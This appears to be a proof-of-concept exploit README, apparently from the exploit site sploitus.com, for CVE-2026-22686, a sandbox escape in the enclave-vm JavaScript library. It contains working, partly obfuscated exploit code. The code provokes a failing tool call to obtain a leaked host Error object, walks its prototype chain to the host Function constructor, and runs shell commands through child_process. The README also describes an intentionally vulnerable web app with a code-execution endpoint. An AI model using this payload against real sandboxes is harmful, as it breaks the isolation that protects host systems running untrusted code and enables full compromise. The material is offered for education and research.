Share
## https://sploitus.com/exploit?id=A9D2D6F7-9CFE-56AF-9C8A-1CA767BFEFC3
# CVE-2026-22686 Web Application PoC

**Critical Sandbox Escape Vulnerability Demo**

## Quick Start

```bash
docker-compose up web
```

Then open: **http://localhost:3000**

## The Vulnerability

CVE-2026-22686 allows untrusted code to escape JavaScript sandboxes by exploiting leaked host-realm Error objects.

**Root Cause:** When tool invocations fail, the sandbox exposes host Error objects that retain their prototype chain, allowing attackers to reach the host `Function` constructor and execute arbitrary code.

## Features

- ๐ŸŒ **Interactive Web UI** - Beautiful interface for testing
- ๐Ÿ’ฅ **Working Exploit** - Vector 35: Host Error Escape technique
- ๐Ÿ“ **Pre-loaded Examples** - Safe code, isolation test, and full exploit
- ๐ŸŽฏ **One-Click Demo** - Load and execute exploit instantly

## Usage

1. **Start the web server:**
   ```bash
   docker-compose up web
   ```

2. **Open in browser:**
   ```
   http://localhost:3000
   ```

3. **Run the exploit:**
   - Click "๐Ÿ’ฃ Load Exploit"
   - Click "โ–ถ๏ธ Execute Code"
   - Watch the sandbox escape happen!

## The Exploit (Vector 35)

```javascript
// Obfuscated string builder
const s = (...args) => String.fromCharCode(...args);
const kCon = s(99,111,110,115,116,114,117,99,116,111,114);

// Setup prototype accessors
const ObjectProto = Object.prototype;
const lookup = ObjectProto.__lookupGetter__;
const getProtoNative = lookup.call(ObjectProto, '__proto__');

// Trigger non-existent tool to get host Error
try {
  await useTool('THIS_TOOL_DOES_NOT_EXIST_XYZ', {});
} catch (hostError) {
  // Walk prototype chain
  const errProto = getProtoNative.call(hostError);
  const ErrorCtor = errProto[kCon];
  const HostFunc = ErrorCtor[kCon];
  
  // Execute arbitrary code in host context
  const getProcess = HostFunc('return process');
  const proc = getProcess();
  
  // Full RCE achieved!
  const child_process = proc.mainModule.require('child_process');
  child_process.execSync('whoami'); // runs as root
}
```

## Project Structure

```
โ”œโ”€โ”€ web-server.js        - Web application (main)
โ”œโ”€โ”€ enclave-vm.js        - Vulnerable sandbox library
โ”œโ”€โ”€ docker-compose.yml   - Docker orchestration
โ”œโ”€โ”€ Dockerfile.web       - Web container
โ”œโ”€โ”€ package.json         - Dependencies
โ””โ”€โ”€ README.md            - This file
```

## Browser Cache Fix

If you see JavaScript errors in the console:

**Hard refresh:** `Ctrl+Shift+R` (Windows/Linux) or `Cmd+Shift+R` (Mac)

Or open in **incognito/private mode**.

## API Usage

```bash
curl -X POST http://localhost:3000/execute \
  -H 'Content-Type: application/json' \
  -d '{"code":"console.log(\"test\");"}'
```



## Security Warning

โš ๏ธ **This application is intentionally vulnerable!**

- DO NOT expose to the internet
- ONLY use in isolated environments
- FOR education and research only

## How It Works

1. **Sandbox Created** - enclave-vm uses Node.js VM module
2. **Tool Fails** - Calling non-existent tool throws Error
3. **Error Leaked** - Host-realm Error exposed to sandbox
4. **Chain Walked** - Prototype chain: Error โ†’ Object โ†’ Function
5. **Function Reached** - Host Function constructor accessed
6. **Code Executed** - `Function('return process')()` runs in host
7. **System Compromised** - Full access to child_process, fs, etc.

## References

- **CVE**: CVE-2026-22686
- **CVSS**: 10.0 (Critical)
- **Technique**: Vector 35 - Host Error Escape
- **Affected**: enclave-vm < 2.7.0

## License

Educational and research purposes only.